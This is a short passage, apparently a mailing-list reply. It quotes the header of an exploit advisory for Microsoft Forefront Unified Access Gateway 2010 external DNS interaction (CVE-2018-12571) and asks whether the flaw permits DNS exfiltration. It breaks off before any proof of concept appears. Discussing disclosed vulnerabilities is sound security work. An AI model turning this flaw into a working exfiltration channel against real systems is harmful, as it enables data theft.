Can this be used to perform DNS exfiltration ? (Assuming the UGW is
whitelisted to perform DNS (which it likely must be)
> # Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External
> DNS Interaction
> # Vendor Homepage: https://www.microsoft.com/
> # Version: 2010
> # CVE :
# Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External
DNS Interaction
# Vendor Homepage: https://www.microsoft.com/
# Version: 2010
# CVE : CVE-2018-12571
# MSRC: Case 39000
# Proof of Concept #1
Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to
